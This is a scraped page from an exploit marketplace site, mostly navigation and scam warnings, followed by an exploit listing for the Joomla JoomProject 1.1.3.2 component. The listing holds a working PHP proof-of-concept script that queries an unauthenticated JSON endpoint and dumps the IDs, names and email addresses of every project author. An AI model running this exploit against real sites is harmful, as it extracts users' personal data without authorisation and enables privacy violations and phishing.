0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Joomla JoomProject 1.1.3.2 Component - Information Disclosure Exploit
# Exploit Title: Joomla! Component JoomProject 1.1.3.2 - Information Disclosure # Exploit Author: Ihsan Sencan # Vendor Homepage: http://joomboost.com/ # Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/project-a-task-management/joomproject/ # Version: 1.1.3.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) <?php header ('Content-type: text/html; charset=UTF-8'); $url= "http://localhost/[PATH]/"; $p="index.php?option=com_jpprojects&view=projects&tmpl=component&format=json"; $url = file_get_contents($url.$p); $l = json_decode($url, true); if($l){ echo "*-----------------------------*<br />"; foreach($l as $u){ echo "[-] ID\n\n\n\n:\n" .$u['id']."<br />"; echo "[-] Name\n\n:\n" .$u['author_name']."<br />"; echo "[-] Email\n:\n" .$u['author_email']."<br />"; echo "<br>"; }echo "*-----------------------------*";} else{echo "[-] No user";} ?> # 0day.today [2024-07-03] #